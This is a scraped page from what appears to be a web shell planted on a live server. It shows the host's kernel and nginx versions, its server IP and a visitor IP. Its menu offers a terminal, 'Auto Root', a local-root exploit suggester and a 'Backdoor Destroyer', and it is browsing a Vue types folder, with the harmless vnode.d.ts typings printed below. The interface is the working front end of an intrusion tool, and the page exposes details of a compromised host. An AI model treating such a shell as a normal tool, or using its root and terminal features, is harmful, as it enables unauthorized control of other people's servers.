Linux unitednationsplay.com 3.10.0-1160.45.1.el7.x86_64 #1 SMP Wed Oct 13 17:20:51 UTC 2021 x86_64
nginx/1.20.1
Server IP : 188.130.139.92 & Your IP : 3.137.152.81
Domains :
Cant Read [ /etc/named.conf ]
User : web
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
home /
www /
unp_probe /
node_modules /
vue /
types /
Delete
Unzip
Name
Size
Permission
Date
Action
index.d.ts
598
B
-rw-r--r--
1985-10-26 08:15
options.d.ts
6.66
KB
-rw-r--r--
1985-10-26 08:15
plugin.d.ts
201
B
-rw-r--r--
1985-10-26 08:15
vnode.d.ts
1.65
KB
-rw-r--r--
1985-10-26 08:15
vue.d.ts
6.35
KB
-rw-r--r--
1985-10-26 08:15
Save
Rename
import { Vue } from "./vue"; export type ScopedSlot = (props: any) => VNodeChildrenArrayContents | VNode | string; export type VNodeChildren = VNodeChildrenArrayContents | [ScopedSlot] | string; export interface VNodeChildrenArrayContents extends Array<VNode | string | VNodeChildrenArrayContents> {} export interface VNode { tag?: string; data?: VNodeData; children?: VNode[]; text?: string; elm?: Node; ns?: string; context?: Vue; key?: string | number; componentOptions?: VNodeComponentOptions; componentInstance?: Vue; parent?: VNode; raw?: boolean; isStatic?: boolean; isRootInsert: boolean; isComment: boolean; } export interface VNodeComponentOptions { Ctor: typeof Vue; propsData?: object; listeners?: object; children?: VNodeChildren; tag?: string; } export interface VNodeData { key?: string | number; slot?: string; scopedSlots?: { [key: string]: ScopedSlot | undefined }; ref?: string; refInFor?: boolean; tag?: string; staticClass?: string; class?: any; staticStyle?: { [key: string]: any }; style?: object[] | object; props?: { [key: string]: any }; attrs?: { [key: string]: any }; domProps?: { [key: string]: any }; hook?: { [key: string]: Function }; on?: { [key: string]: Function | Function[] }; nativeOn?: { [key: string]: Function | Function[] }; transition?: object; show?: boolean; inlineTemplate?: { render: Function; staticRenderFns: Function[]; }; directives?: VNodeDirective[]; keepAlive?: boolean; } export interface VNodeDirective { name: string; value?: any; oldValue?: any; expression?: any; arg?: string; modifiers?: { [key: string]: boolean }; }